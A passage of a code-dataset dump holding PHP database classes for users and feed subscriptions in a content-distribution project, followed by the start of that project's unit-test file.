$op \";\n }\n }\n // remove trailing op and spaces\n $search_sql = substr($search_sql, 0, -(strlen($op) + 2));\n // add rest of SQL query\n $search_sql .= ';';\n\n // prepare SQL statement\n $search_stmt = $db->pdo->prepare($search_sql);\n\n // create array of column value bindings\n foreach ($userinfo as $attr=>$values)\n foreach ((array) $values as $key=>$value)\n if (isset(self::$userattrs_to_cols[$attr])\n\t || $attr === self::$carrier_attr)\n\t $search_binds[] = $value;\n\n $search_stmt->execute($search_binds);\n // set fetch mode to create instances of MySQLUser\n $search_stmt->setFetchMode(PDO::FETCH_CLASS, 'MySQLUser', array($db));\n\n // fetch the result and create a new instance of this class\n $search_result = $search_stmt->fetchAll();\n if ($search_result !== FALSE) {\n $c = __CLASS__;\n return new $c($search_result, $db);\n } else\n return NULL;\n }\n\n/* MySQLUsers::searchAll implements iUsers::searchAll (see corresponding\n documentation)\n*/\n public static function searchAll(array $userinfo, iDatabase $db = NULL) {\n if ($db === NULL)\n $db = self::$site_db;\n return self::__searchAll($userinfo, $db);\n }\n /* MySQLUsers::__searchAll is a helper function to MySQLUsers::searchAll \n which performs the actual search operation. This function was added in\n order to use typehinting on parameter $db.\n */\n private static function __searchAll(array $userinfo, MySQLDB $db) {\n return self::__search($userinfo, 'AND', $db);\n }\n\n/* MySQLUsers::searchAny implements iUsers::searchAny (see corresponding\n documentation)\n*/\n public static function searchAny(array $userinfo, iDatabase $db = NULL) {\n if ($db === NULL)\n $db = self::$site_db;\n return self::__searchAny($userinfo, $db);\n }\n /* MySQLUsers::__searchAny is a helper function to MySQLUsers::searchAny \n which performs the actual search operation. This function was added in\n order to use typehinting on parameter $db.\n */\n private static function __searchAny(array $userinfo, MySQLDB $db) {\n return self::__search($userinfo, 'OR', $db);\n }\n\n/* MySQLUsers::merge implements iUsers::merge (see corresponding documentation)\n*/\n public function merge(iUsers $users) {\n return self::__merge($users);\n }\n /* MySQLUsers::__merge is a helper function to MySQLUsers::merge which\n performs the actual merge operation. 
This function was added in order to\n use typehinting on parameter $users.\n */\n public function __merge(MySQLUsers $users) {\n if ($this->db !== $users->db)\n throw new InvalidArgumentException('$db must match between objects');\n $c = __CLASS__;\n return new $c(array_merge($this->users, $users->users), $this->db);\n }\n}\n\n/* class MySQLUser implements iUser on MySQL databases (see corresponding \n documentation)\n*/\nclass MySQLUser extends MySQLDBObject implements iUser {\n /* $db is the database which contains this user */\n private $db;\n /* $uid is the unique user identifier which is used to access user \n information in the database */\n public $uid;\n\n static $carrier_attr = 'carrier';\n static $feeds_attr = 'feeds';\n static $reception_attrs_to_methods = array('send_email'=>'email',\n\t\t\t\t\t 'send_sms_link'=>'sms_link', \n\t\t\t\t\t 'send_sms_text'=>'sms_text');\n\n /* function MySQLUser::__construct is the constructor for the class\n\n $db: (MySQLDB) a valid MySQLDB object connected to the MySQL database to\n use\n */\n private function __construct(MySQLDB $db) {\n $this->db = $db;\n }\n\n /* function MySQLUser::__get is the PHP magic 'get' function for the class */\n public function __get($name) {\n $ret = $this->get(array($name));\n if ($ret === NULL || !isset($ret[$name]))\n return NULL;\n else\n return $ret[$name];\n }\n\n /* function MySQLUser::__set is the PHP magic 'set' function for the class */\n public function __set($name, $value) {\n $this->set(array($name=>$value));\n }\n\n /* parseUserInfo transforms a $userinfo array, in the format taken by many\n iUser functions, into an associative array with keys as database column\n names\n */\n private static function parseUserInfo(array $userinfo, MySQLDB $db) {\n static $valid_userinfo_attrs = \n array('username'=>TRUE, 'email'=>TRUE, 'password'=>TRUE, \n\t 'phone_number'=>TRUE, 'phone_pin'=>TRUE, 'phone_confirmed'=>TRUE,\n\t 'email_pin'=>TRUE, 'email_confirmed'=>TRUE);\n\n // guard with isset() so absent keys do not raise notices\n if (isset($userinfo['phone_confirmed']) && $userinfo['phone_confirmed'] === FALSE)\n throw new UnexpectedValueException('attribute phone_confirmed cannot be'.\n\t\t\t\t\t ' set to FALSE');\n if (isset($userinfo['email_confirmed']) && $userinfo['email_confirmed'] === FALSE)\n throw new UnexpectedValueException('attribute email_confirmed cannot be'.\n\t\t\t\t\t ' set to FALSE');\n\n // check for simultaneous pin and confirmed\n if (isset($userinfo['email_pin']) && isset($userinfo['email_confirmed']))\n throw new InvalidArgumentException('email_pin and email_confirmed '.\n\t\t\t\t\t 'attributes cannot be set '.\n\t\t\t\t\t 'simultaneously');\n if (isset($userinfo['phone_pin']) && isset($userinfo['phone_confirmed']))\n throw new InvalidArgumentException('phone_pin and phone_confirmed '.\n\t\t\t\t\t 'attributes cannot be set '.\n\t\t\t\t\t 'simultaneously');\n\n $db_userinfo = array();\n\n // rename the userinfo keys as database column names\n foreach ($userinfo as $key=>$value)\n if (isset($valid_userinfo_attrs[$key]))\n\t$db_userinfo[self::$userattrs_to_cols[$key]] = $value;\n\n // fix pin and confirmed attributes\n if (isset($db_userinfo['phone_status'])\n\t&& $db_userinfo['phone_status'] === TRUE)\n $db_userinfo['phone_status'] = 0;\n if (isset($db_userinfo['email_status'])\n\t&& $db_userinfo['email_status'] === TRUE)\n $db_userinfo['email_status'] = 0;\n\n return $db_userinfo;\n }\n\n/* MySQLUser::find implements iUser::find (see corresponding documentation).\n Parameter $attr is validated against a whitelist below, so it is not\n interpolated into the SQL unchecked.\n*/\n public static function find($attr, $value, iDatabase $db = NULL) {\n if ($db === NULL)\n $db = 
self::$site_db;\n return self::__find($attr, $value, $db);\n }\n\n /* MySQLUser::__find is a helper function to MySQLUser::find which performs\n the actual find operation. This function was added in order to use\n typehinting on parameter $db.\n */\n private static function __find($attr, $value, MySQLDB $db) {\n /* $valid_find_userattrs is a list of attributes from $userinfo which can\n be used as input to this function. Keep this list updated with\n MySQLDBObject::$userattrs_to_cols.\n */\n static $valid_find_userattrs = \n array('id'=>TRUE, 'uid'=>TRUE, 'username'=>TRUE, 'email'=>TRUE,\n\t 'password'=>TRUE, 'phone_number'=>TRUE);\n\n if (isset($valid_find_userattrs[$attr]))\n $db_attr = self::$userattrs_to_cols[$attr];\n else\n throw new InvalidArgumentException('parameter $attr is not a valid '.\n\t\t\t\t\t 'attribute');\n\n\n $find_sql = \"SELECT uid FROM users WHERE $db_attr=:value;\";\n $find_stmt = $db->pdo->prepare($find_sql);\n $find_stmt->bindParam(':value', $value);\n $find_stmt->execute();\n // set fetch mode to create an instance of this class\n $find_stmt->setFetchMode(PDO::FETCH_CLASS, __CLASS__, array('db'=>$db));\n $find_result = $find_stmt->fetch();\n return $find_result !== FALSE ? $find_result : NULL;\n }\n\n/* MySQLUser::set implements iUser::set (see corresponding documentation)\n*/\n public function set(array $userinfo) {\n // parse $userinfo into a format able to be fed straight into the database\n $db_userinfo = self::parseUserInfo($userinfo, $this->db);\n\n $sql_added = FALSE;\n\n // carrier requires cid to be looked up in database\n static $carrier_col = 'cid';\n static $carrier_sql =\n '(SELECT cid FROM carriors WHERE carrior_name=:carrior_name)';\n $carrier_bind = array();\n if (isset($userinfo[self::$carrier_attr]))\n $carrier_bind['carrior_name'] = $userinfo[self::$carrier_attr];\n\n // build the SQL query to use to update the user\n $update_sql = 'UPDATE users SET ';\n // add column names and values\n foreach ($db_userinfo as $col=>$value) {\n $update_sql .= $col.'=:'.$col.', ';\n $sql_added = TRUE;\n }\n // add carrier name and value\n if (isset($userinfo[self::$carrier_attr])) {\n $update_sql .= $carrier_col.'='.$carrier_sql.', ';\n $sql_added = TRUE;\n }\n // remove trailing comma and space\n $update_sql = substr($update_sql, 0, -2);\n // add rest of UPDATE statment\n $update_sql .= ' WHERE uid=:uid;';\n\n // do not attempt the SELECT if no attrs were added to the select\n if ($sql_added === TRUE) {\n // prepare the SQL statement\n $update_stmt = $this->db->pdo->prepare($update_sql);\n\n // bind column values\n foreach (array_merge($db_userinfo, $carrier_bind) as $col=>$value)\n\t$update_stmt->bindValue(':'.$col, $value);\n // bind uid\n $update_stmt->bindParam(':uid', $this->uid);\n \n // execute the SQL statement\n $update_stmt->execute();\n }\n\n // deal with setting user reception methods\n $this->setReceptions($userinfo);\n\n // set feeds for user if necessary\n if (isset($userinfo[self::$feeds_attr]))\n $this->setFeeds($userinfo[self::$feeds_attr]);\n }\n\n /* MySQLUser::setReceptions sets reception methods for a user based on an\n arbitrary $userinfo array\n\n $userinfo: (array) user receptions to set, encoded in key-value pairs as\n described for the $userinfo parameter in MySQLUser::set\n */\n private function setReceptions(array $userinfo) {\n /* receptions require reception_method to be looked up 'reception_methods'\n and set for the user separately in 'receptions' */\n static $reception_enable_sql =\n 'INSERT IGNORE INTO receptions (uid, rid) 
\n VALUES (:uid, (SELECT rid FROM reception_methods \n WHERE method_type=:method));';\n static $reception_disable_sql =\n 'DELETE FROM receptions WHERE uid=:uid AND \n rid=(SELECT rid FROM reception_methods WHERE method_type=:method);';\n\n foreach (self::$reception_attrs_to_methods as $attr=>$method) {\n if (isset($userinfo[$attr])) {\n\tif ($userinfo[$attr] === TRUE) {\n\t // we only need to prepare statement once\n\t if (!isset($reception_enable_stmt)) {\n\t // prepare the enabling statement\n\t $reception_enable_stmt =\n\t $this->db->pdo->prepare($reception_enable_sql);\n\t // bind values and dynamic parameters\n\t $reception_enable_stmt->bindValue(':uid', $this->uid);\n\t $reception_enable_stmt->bindParam(':method', $method);\n\t }\n\n\t // execute the statement\n\t $reception_enable_stmt->execute();\n\t} else if ($userinfo[$attr] === FALSE) {\n\t // we only need to prepare statement once\n\t if (!isset($reception_disable_stmt)) {\n\t // prepare the disabling statement\n\t $reception_disable_stmt = \n\t $this->db->pdo->prepare($reception_disable_sql);\n\t // bind static values and dynamic parameters\n\t $reception_disable_stmt->bindValue(':uid', $this->uid);\n\t $reception_disable_stmt->bindParam(':method', $method);\n\t }\n\n\t // execute the statement\n\t $reception_disable_stmt->execute();\n\t}\n }\n }\n }\n\n /* MySQLUser::getReceptions gets reception method settings for a user based\n on an arbitrary $userattrs array\n\n $userattrs: (array) an array of strings specifying the desired user\n reception method settings to get, selected from the possible\n\t\t keys in the list of key-value pairs returned by MySQLUser::get\n\n returns an array containing all requested user reception method settings\n that could be successfully fetched, in the form described in the\n description of the $userattrs parameter\n */\n private function getReceptions(array $userattrs) {\n /* receptions require reception_method to be looked up 'reception_methods'\n and retrieved for the user separately in 'receptions' */\n static $reception_sql =\n 'SELECT TRUE FROM receptions WHERE uid=:uid AND \n rid=(SELECT rid FROM reception_methods WHERE method_type=:method);';\n\n $userinfo = array();\n\n // prepare the enabling statement\n $reception_stmt = $this->db->pdo->prepare($reception_sql);\n // bind values and dynamic parameters\n $reception_stmt->bindValue(':uid', $this->uid);\n $reception_stmt->bindParam(':method', $method);\n foreach (self::$reception_attrs_to_methods as $attr=>$method) {\n if (in_array($attr, $userattrs)) {\n\t$reception_stmt->execute();\n\t$userinfo[$attr] = ($reception_stmt->fetch() !== FALSE);\n }\n }\n\n return $userinfo;\n }\n\n/* MySQLUser::addFeed implements iUser::addFeed (see corresponding \n documentation)\n*/\n public function addFeed(iFeed $feed) {\n return $this->addFeeds(new MySQLFeeds(array($feed), $this->db));\n }\n\n/* MySQLUser::addFeeds implements iUser::addFeeds (see corresponding \n documentation)\n*/\n public function addFeeds(iFeeds $feeds) {\n return $this->__addFeeds($feeds);\n }\n\n /* MySQLUser::__addFeeds is a helper function to MySQLUser::addFeeds which\n performs the actual add operation. 
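(For illustration only: a sketch of the public entry points this helper\n serves, assuming $user is an existing MySQLUser, $db a connected MySQLDB,\n and the feed names and URLs are hypothetical:\n\n $feed = MySQLFeed::create(array('name'=>'Example News',\n 'url'=>'http://example.com/rss'), $db);\n $user->addFeed($feed); // subscribe to a single feed\n $feeds = MySQLFeeds::create(array(\n array('name'=>'Feed A', 'url'=>'http://a.example/rss'),\n array('name'=>'Feed B', 'url'=>'http://b.example/rss')), $db);\n $user->addFeeds($feeds); // or subscribe to several at once\n\n Duplicate subscriptions are skipped by the SELECT guard below.)\n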
This function was added in order to use\n typehinting on parameter $feeds.\n */\n private function __addFeeds(MySQLFeeds $feeds) {\n /* $feeds_find_sql is the SQL statement used to verify that the user has\n not already subscribed to a feed */\n static $feeds_find_sql =\n 'SELECT TRUE FROM favorites WHERE uid=:uid AND sid=:sid;';\n /* $feeds_sql is the SQL statement used to add a feed subscription to the \n user */\n static $feeds_sql = \n 'INSERT IGNORE INTO favorites (uid, sid, priority)\n VALUES (:uid, :sid, :priority)';\n\n // prepare the find subscription SQL statement (to be used multiple times)\n $feeds_find_stmt = $this->db->pdo->prepare($feeds_find_sql);\n // bind the static values\n $feeds_find_stmt->bindValue(':uid', $this->uid);\n // bind the sid to $sid\n $feeds_find_stmt->bindParam(':sid', $sid);\n\n // prepare the add subscription SQL statement (to be used multiple times)\n $feeds_stmt = $this->db->pdo->prepare($feeds_sql);\n // bind the static values\n $feeds_stmt->bindValue(':uid', $this->uid);\n // XXX this is a dummy priority value\n $feeds_stmt->bindValue(':priority', 0);\n // bind the sid to $sid\n $feeds_stmt->bindParam(':sid', $sid);\n\n foreach ($feeds as $feed) {\n // change the sid to use in the statement\n $sid = $feed->sid;\n\n // check that the user is not already subscribed\n $feeds_find_stmt->execute();\n if ($feeds_find_stmt->fetch() === FALSE) {\n\t// execute the add subscription statement\n\t$feeds_stmt->execute();\n }\n }\n }\n\n /* MySQLUser::setFeeds is a written as a helper function to MySQLUser::set\n which carries out the operation of setting a user's feeds\n\n $feeds: (MySQLFeeds) an iFeeds object representing the set of feeds to add\n to the user\n */\n private function setFeeds(MySQLFeeds $feeds) {\n static $delete_feeds_sql = 'DELETE FROM favorites WHERE uid=:uid';\n\n // delete the user's existing feeds\n $delete_feeds_stmt = $this->db->pdo->prepare($delete_feeds_sql);\n $delete_feeds_stmt->bindValue(':uid', $this->uid);\n $delete_feeds_stmt->execute();\n\n // add the new feeds to the user\n $this->addFeeds($feeds);\n }\n\n /* MySQLUser::getFeeds is a written as a helper function to MySQLUser::get\n which carries out the operation of getting a user's feeds\n\n returns a MySQLFeeds object representing the set of the user's feeds\n */\n private function getFeeds() {\n static $feeds_sql = 'SELECT sid FROM favorites WHERE uid=:uid;';\n $feeds_stmt = $this->db->pdo->prepare($feeds_sql);\n $feeds_stmt->bindParam(':uid', $this->uid);\n $feeds_stmt->execute();\n /* XXX creating the objects this way relies on DB consistency (sid is not\n checked to be existent in feed_sources table) */\n $feeds_stmt->setFetchMode(PDO::FETCH_CLASS, 'MySQLFeed', \n\t\t\t array('db'=>$this->db));\n $feeds_result = $feeds_stmt->fetchAll();\n return new MySQLFeeds($feeds_result, $this->db);\n }\n\n/* MySQLUser::get implements iUser::get (see corresponding documentation)\n*/\n public function get(array $userattrs) {\n /* $valid_userattrs is a list of attributes from $userattrs which can be\n handled by the simple sql query generator below. 
Keep this list updated\n with MySQLDBObject::$userattrs_to_cols.\n */\n static $valid_userattrs = \n array('username'=>TRUE, 'email'=>TRUE, 'password'=>TRUE, \n\t 'phone_number'=>TRUE, 'phone_pin'=>TRUE, 'phone_confirmed'=>TRUE,\n\t 'email_pin'=>TRUE, 'email_confirmed'=>TRUE);\n\n static $carrier_sql = '(SELECT carrior_name FROM carriors WHERE\n cid=(SELECT cid FROM users WHERE uid=:uid2))';\n\n $sql_added = FALSE;\n $get_result = array();\n\n // build SQL query to use to get user attributes\n $get_sql = 'SELECT ';\n // add column names\n foreach ($userattrs as $key=>$attr) {\n if (isset($valid_userattrs[$attr])) {\n\t$get_sql .= self::$userattrs_to_cols[$attr].\" AS $attr, \";\n\t$sql_added = TRUE;\n } elseif ($attr === self::$carrier_attr) {\n\t$get_sql .= \"$carrier_sql AS $attr, \";\n\t$sql_added = TRUE;\n }\n }\n // remove trailing comma and space\n $get_sql = substr($get_sql, 0, -2);\n // add rest of SQL query\n $get_sql .= ' FROM users WHERE uid=:uid;';\n\n // do not attempt the SELECT if no attrs were added to the select\n if ($sql_added === TRUE) {\n $get_stmt = $this->db->pdo->prepare($get_sql);\n $get_stmt->bindParam(':uid', $this->uid);\n\n // bind carrier specific column values\n if (in_array('carrier', $userattrs))\n\t$get_stmt->bindParam(':uid2', $this->uid);\n \n $get_stmt->execute();\n $get_result = $get_stmt->fetch(PDO::FETCH_ASSOC);\n if ($get_result === FALSE)\n\tthrow new Exception('PDOStatement::fetch failed');\n }\n\n // fix pin and confirmed attributes\n if (isset($get_result['phone_pin']) && $get_result['phone_pin'] === 0)\n $get_result['phone_pin'] = NULL;\n if (isset($get_result['phone_confirmed'])) {\n if ($get_result['phone_confirmed'] == 0)\n\t$get_result['phone_confirmed'] = TRUE;\n else\n\t$get_result['phone_confirmed'] = FALSE;\n }\n if (isset($get_result['email_pin']) && $get_result['email_pin'] === 0)\n $get_result['email_pin'] = NULL;\n if (isset($get_result['email_confirmed'])) {\n if ($get_result['email_confirmed'] == 0)\n\t$get_result['email_confirmed'] = TRUE;\n else\n\t$get_result['email_confirmed'] = FALSE;\n }\n\n // get id if requested\n if (in_array('id', $userattrs))\n $get_result['id'] = $this->uid;\n if (in_array('uid', $userattrs))\n $get_result['uid'] = $this->uid;\n\n // get reception method settings if requested\n $get_result = array_merge($get_result, $this->getReceptions($userattrs));\n\n // get feeds if requested\n if (in_array(self::$feeds_attr, $userattrs))\n $get_result[self::$feeds_attr] = $this->getFeeds();\n\n return $get_result;\n }\n\n/* MySQLUser::create implements iUser::create (see corresponding documentation)\n*/\n public static function create(array $userinfo, iDatabase $db = NULL) {\n if ($db === NULL)\n $db = self::$site_db;\n return self::__create($userinfo, $db);\n }\n\n /* MySQLUser::__create is a helper function to MySQLUser::create which\n performs the actual create operation. 
This function was added in order to \n use typehinting on parameter $db.\n */\n private static function __create($userinfo, MySQLDB $db) {\n // parse $userinfo into a format able to be fed straight into the database\n $db_userinfo = self::parseUserInfo($userinfo, $db);\n\n // carrier requires cid to be looked up in database\n static $carrier_col = 'cid';\n static $carrier_sql =\n '(SELECT cid FROM carriors WHERE carrior_name=:carrior_name)';\n $carrier_bind = array('carrior_name'=>$userinfo['carrier']);\n\n // build the SQL query to use to create the user\n $create_sql = 'INSERT INTO users (';\n // add column names\n foreach ($db_userinfo as $col=>$value)\n $create_sql .= $col.', ';\n $create_sql .= $carrier_col.', ';\n // remove trailing comma and space\n $create_sql = substr($create_sql, 0, -2);\n // add column values\n $create_sql .= ') VALUES (';\n foreach ($db_userinfo as $col=>$value)\n $create_sql .= ':'.$col.', ';\n $create_sql .= $carrier_sql.', ';\n // remove trailing comma and space\n $create_sql = substr($create_sql, 0, -2);\n $create_sql .= ');';\n\n // prepare the SQL statement\n $create_stmt = $db->pdo->prepare($create_sql);\n\n // bind column values\n foreach (array_merge($db_userinfo, $carrier_bind) as $col=>$value)\n $create_stmt->bindValue(':'.$col, $value);\n\n // execute the SQL statement\n $create_stmt->execute();\n\n // construct the MySQLUser object\n // XXX check that using PDO::lastInsertId is not a race\n $c = __CLASS__;\n $user = new $c($db);\n $user->uid = $db->pdo->lastInsertId();\n\n // deal with setting user reception methods\n $user->setReceptions($userinfo);\n\n // set the user's inital feeds\n if (isset($userinfo[self::$feeds_attr]))\n $user->feeds = $userinfo[self::$feeds_attr];\n\n return $user;\n }\n\n/* MySQLUser::delete implements iUser::delete (see corresponding documentation)\n*/\n public function delete() {\n // build the SQL query to use to delete the user\n static $delete_sql = 'DELETE FROM users WHERE uid=:uid;';\n // prepare the SQL statement\n $delete_stmt = $this->db->pdo->prepare($delete_sql);\n // bind column values\n $delete_stmt->bindValue(':uid', $this->uid);\n // execute the SQL statement\n $delete_stmt->execute();\n\n /* unset $this->uid so that future operations on this MySQLUser object\n will fail */\n unset ($this->uid);\n }\n}\n" }, { "alpha_fraction": 0.5980704426765442, "alphanum_fraction": 0.6038778424263, "avg_line_length": 33.55016326904297, "blob_id": "cfc54cc2720ad31b535f8a8c73002fd9d3b25187", "content_id": "667d5b1bc1f0917af94a9982def1027e793c74c4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 10676, "license_type": "no_license", "max_line_length": 79, "num_lines": 309, "path": "/www/trunk/db_mysql_test.php", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "<?php\nrequire_once('db.php');\nrequire_once('db_mysql.php');\nrequire_once('db_mysql_users.php');\nrequire_once('db_mysql_feeds.php');\nrequire_once('db_mysql_stories.php');\n\n/* class MySQLTest contains functions used for unit testing on MySQLObject\n derived classes\n*/\nclass MySQLTest extends MySQLDBObject {\n static $userinfo = array('username'=>'MySQLTest_user',\n\t\t\t 'password'=>'MySQLTest_password',\n\t\t\t 'email'=>'[email protected]',\n\t\t\t 'phone_number'=>'8562447598',\n\t\t\t 'send_email'=>TRUE,\n\t\t\t 'send_sms_text'=>FALSE,\n\t\t\t 'carrier'=>'AT&T');\n static $userinfo_2 = array('username'=>'MySQLTest_user2',\n\t\t\t 
'password'=>'MySQLTest_password',\n\t\t\t 'email'=>'[email protected]',\n\t\t\t 'send_email'=>TRUE,\n\t\t\t 'phone_number'=>'9688472548',\n\t\t\t 'carrier'=>'Verizon');\n static $feedinfo = array('name'=>'MySQLTest_feed',\n\t\t\t 'url'=>'MySQLTest_url');\n static $feedinfo_2 = array('name'=>'MySQLTest_feed2',\n\t\t\t 'url'=>'MySQLTest_url2');\n\n public static function testAll(MySQLDB $db = NULL) {\n self::testUser($db);\n self::testUsers($db);\n self::testFeed($db);\n self::testFeeds($db);\n self::testStories($db);\n }\n\n public static function testUser(MySQLDB $db = NULL) {\n try {\n // MySQLUser::create test\n $user = MySQLUser::create(self::$userinfo, $db);\n if ($user === NULL)\n throw new Exception('MySQLUser::create test failed');\n\n // MySQLUser::find test\n $find_user = MySQLUser::find('username', self::$userinfo['username'], $db);\n if ($find_user === NULL)\n throw new Exception('MySQLUser::find test failed');\n\n // MySQLUser::delete test\n $user->delete();\n unset($user);\n $deleted_user = MySQLUser::find('username', \n\t\t\t\t self::$userinfo['username'], $db);\n if ($deleted_user !== NULL)\n throw new Exception('MySQLUser::delete test failed');\n\n // MySQLUser::get test\n $user = MySQLUser::create(self::$userinfo, $db);\n $get_userinfo = $user->get(array_keys(self::$userinfo));\n if ($get_userinfo != self::$userinfo)\n throw new Exception('MySQLUser::get test failed');\n\n // MySQLUser::get no-carrier-as-attr test\n $userinfo_nocarrier = self::$userinfo;\n unset($userinfo_nocarrier['carrier']);\n $get_userinfo_nocarrier = $user->get(array_keys($userinfo_nocarrier));\n if ($get_userinfo_nocarrier != $userinfo_nocarrier)\n throw new Exception('MySQLUser::get no-carrier-as-attr test failed');\n\n // MySQLUser::set test\n $user->set(self::$userinfo_2);\n $set_userinfo = $user->get(array_keys(self::$userinfo_2));\n if ($set_userinfo != self::$userinfo_2)\n throw new Exception('MySQLUser::set test failed');\n\n // MySQLUser::set no-carrier-as-attr test\n $userinfo_2_nocarrier = self::$userinfo_2;\n unset($userinfo_2_nocarrier['carrier']);\n $get_userinfo_2_nocarrier = $user->get(array_keys($userinfo_2_nocarrier));\n if ($get_userinfo_2_nocarrier != $userinfo_2_nocarrier)\n throw new Exception('MySQLUser::set no-carrier-as-attr test failed');\n\n // MySQLUser::__get test\n $get_username = $user->get(array('username'));\n if ($user->username !== $get_username['username'])\n throw new Exception('MySQLUser::__get test failed');\n\n // MySQLUser::__set test\n $user->username = 'newusername';\n if ($user->username !== 'newusername')\n throw new Exception('MySQLUser::__set test failed');\n\n // MySQLUser::create with-feeds test (depends on MySQLFeeds::create)\n $user->delete();\n $feeds = MySQLFeeds::create(array(self::$feedinfo));\n $user = MySQLUser::create(array_merge(self::$userinfo, \n\t\t\t\t\t array('feeds'=>$feeds)), $db);\n if ($user === NULL)\n throw new Exception('MySQLUser::create with-feeds test failed');\n\n // MySQLUser::get feeds test\n $get_userinfo = $user->get(array('feeds'));\n if (!($get_userinfo['feeds'] instanceof MySQLFeeds)\n\t|| count($get_userinfo['feeds']->feeds) != 1)\n throw new Exception('MySQLUser::get feeds test failed');\n\n // MySQLUser::set feeds test\n $feeds = MySQLFeeds::create(array(self::$feedinfo, self::$feedinfo_2));\n $user->set(array('feeds'=>$feeds));\n $get_userinfo = $user->get(array('feeds'));\n if (!($get_userinfo['feeds'] instanceof MySQLFeeds)\n\t|| count($get_userinfo['feeds']->feeds) != 2)\n throw new Exception('MySQLUser::set feeds 
test failed');\n\n $user->delete();\n foreach ($feeds as $feed)\n $feed->delete();\n unset($user);\n } catch(Exception $e) {\n if (isset($feeds))\n\tforeach ($feeds as $feed)\n\t $feed->delete();\n if (isset($user))\n\t$user->delete();\n throw $e;\n }\n }\n\n public static function testUsers(MySQLDB $db = NULL) {\n try {\n // MySQLUsers::searchAll test\n $user = MySQLUser::create(self::$userinfo, $db);\n $user_2 = MySQLUser::create(self::$userinfo_2, $db);\n $search_users = \n MySQLUsers::searchAll(array_intersect(self::$userinfo, \n\t\t\t\t\t self::$userinfo_2), $db);\n if ($search_users === NULL || count($search_users->users) !== 2)\n throw new Exception('MySQLUsers::searchAll test failed');\n\n // MySQLUsers::searchAny username test\n $search_users = \n MySQLUsers::searchAny(array('username'=>\n\t\t\t\t array(self::$userinfo['username'],\n\t\t\t\t\t self::$userinfo_2['username'])), $db);\n if ($search_users === NULL || count($search_users->users) !== 2)\n throw new Exception('MySQLUsers::searchAny username test failed');\n\n // MySQLUsers::searchAll match-one test\n $search_users = \n MySQLUsers::searchAll(array_diff(self::$userinfo, \n\t\t\t\t self::$userinfo_2), $db);\n if ($search_users === NULL || count($search_users->users) !== 1)\n throw new Exception('MySQLUsers::searchAll match-one test failed');\n\n // MySQLUsers::searchAny match-one test\n $search_users_2 = \n MySQLUsers::searchAny(array('username'=>self::$userinfo_2['username']),\n\t\t\t $db);\n if ($search_users_2 === NULL || count($search_users_2->users) !== 1)\n throw new Exception('MySQLUsers::searchAny username match-one test '.\n\t\t\t 'failed');\n\n // MySQLUsers::merge test\n $merge_users = $search_users->merge($search_users_2);\n if ($merge_users === NULL || count($merge_users->users) !== 2)\n throw new Exception('MySQLUsers::merge test failed');\n\n $user->delete();\n $user_2->delete();\n } catch(Exception $e) {\n if (isset($user))\n\t$user->delete();\n if (isset($user_2))\n\t$user_2->delete();\n throw $e;\n } \n }\n\n public static function testFeed(MySQLDB $db = NULL) {\n try {\n // MySQLFeed::create test\n $feed = MySQLFeed::create(self::$feedinfo, $db);\n if ($feed === NULL)\n throw new Exception('MySQLFeed::create test failed');\n\n // MySQLFeed::find test\n $find_feed = MySQLFeed::find('name', self::$feedinfo['name'], $db);\n if ($find_feed === NULL)\n throw new Exception('MySQLFeed::find test failed');\n\n // MySQLFeed::delete test\n $feed->delete();\n unset($feed);\n $deleted_feed = MySQLFeed::find('name', \n\t\t\t\t self::$feedinfo['name'], $db);\n if ($deleted_feed !== NULL)\n throw new Exception('MySQLFeed::delete test failed');\n\n // MySQLFeed::get test\n $feed = MySQLFeed::create(self::$feedinfo, $db);\n $get_feedinfo = $feed->get(array_keys(self::$feedinfo));\n if ($get_feedinfo != self::$feedinfo)\n throw new Exception('MySQLFeed::get test failed');\n\n // MySQLFeed::__get test\n $get_name = $feed->get(array('name'));\n if ($feed->name !== $get_name['name'])\n throw new Exception('MySQLFeed::__get test failed');\n\n $feed->delete();\n } catch(Exception $e) {\n if (isset($feed))\n\t$feed->delete();\n throw $e;\n } \n }\n\n public static function testFeeds(MySQLDB $db = NULL) {\n try {\n $feedinfos = array(self::$feedinfo, self::$feedinfo_2);\n\n // MySQLFeeds::create test\n $feeds = MySQLFeeds::create($feedinfos);\n if ($feeds === NULL || count($feeds->feeds) < 2)\n\tthrow new Exception('MySQLFeeds::create failed');\n\n // MySQLFeeds foreach test\n foreach($feeds as $feed) {\n\tif (!($feed instanceof 
MySQLFeed))\n\t throw new Exception('MySQLFeeds foreach test failed');\n }\n\n foreach($feeds as $feed)\n\t$feed->delete();\n } catch (Exception $e) {\n if (isset($feeds)) {\n\tforeach($feeds->feeds as $feed)\n\t $feed->delete();\n }\n throw $e;\n }\n }\n\n public static function testStories(MySQLDB $db = NULL) {\n if ($db === NULL)\n $db = self::$site_db;\n try {\n // MySQLFeed::get stories test (relies on MySQLFeed::create)\n $feed = MySQLFeed::create(self::$feedinfo, $db);\n $db->pdo->exec(\"INSERT INTO feed_stories\n\t\t (title, content, url, time_stamp, sid, gid)\n\t\t VALUES ('MySQLTest_title', 'MySQLTest_content',\n 'MySQLTest_storyurl', \".time().\",\n \".$feed->sid.\", 1);\");\n $db->pdo->exec(\"INSERT INTO feed_stories\n\t\t (title, content, url, time_stamp, sid, gid)\n\t\t VALUES ('MySQLTest_title2', 'MySQLTest_content2',\n 'MySQLTest_storyurl', \".time().\",\n \".$feed->sid.\", 1);\");\n\n $get_feedinfo = $feed->get(array('stories'), $db);\n $stories = $get_feedinfo['stories'];\n if ($get_feedinfo === NULL)\n throw new Exception('MySQLFeed::get stories test failed');\n\n // MySQLStories foreach test\n foreach($stories as $story) {\n if (!($story instanceof MySQLStory))\n\tthrow new Exception('MySQLStories foreach test failed');\n }\n\n foreach ($stories as $story) {\n // MySQLStory::find test\n $find_story = MySQLStory::find('fid', $story->fid, $db);\n if ($find_story === NULL || $find_story->fid != $story->fid)\n\tthrow new Exception('MySQLFeed::find test failed');\n\n // MySQLStory::get test\n $get_storyinfo = $story->get(array('url'));\n if ($get_storyinfo['url'] != 'MySQLTest_storyurl')\n\tthrow new Exception('MySQLStory::get test failed');\n\n // MySQLStory::__get test\n $get_name = $story->get(array('content'));\n if ($story->content !== $get_name['content'])\n\tthrow new Exception('MySQLStory::__get test failed');\n\n $db->pdo->exec(\"DELETE FROM feed_stories WHERE fid={$story->fid};\");\n /* XXX if this line is added and \"SELECT * FROM feed_stories WHERE \n\t url='MySQLTest_storyurl';\" is run from the same system in the 'mysql'\n\t program, then the stories are not deleted below! 
